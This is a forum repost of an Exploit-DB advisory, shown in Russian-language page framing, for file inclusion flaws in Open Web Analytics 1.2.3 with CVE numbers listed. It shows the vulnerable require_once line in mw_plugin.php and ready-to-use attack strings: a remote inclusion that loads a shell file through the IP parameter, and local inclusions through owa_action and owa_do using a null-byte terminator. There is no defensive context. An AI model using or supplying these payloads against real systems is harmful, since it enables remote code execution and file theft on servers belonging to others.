Exploit Open Web Analytics 1.2.3 - Multiple File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11903
Проверка EDB
  1. Пройдено
Автор
ITSECTEAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-2677 cve-2010-2676
Дата публикации
2010-03-27
Код:
===========================================================================
( #Topic    : Open Web Analytics 1.2.3
( #Bug type : multi file include
( #Download : http://downloads.openwebanalytics.com/owa/owa_1_2_3.tar
( #Advisory : 
===========================================================================
( #Author : ItSecTeam
( #Email  : [email protected]
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
( #Special Tnx : ahmadbady , [email protected] And All Team Members!

vuls:===================================================================
path/mw_plugin.php

require_once "$IP/includes/SpecialPage.php";   

exploit:===================================================================

rfi : path/mw_plugin.php?IP=shell.txt?

lfi :path/index.php?owa_action=[lfi]%00
lfi :path/index.php?owa_do=[lfi]%00
--------------------------------------
 
Источник
www.exploit-db.com

Похожие темы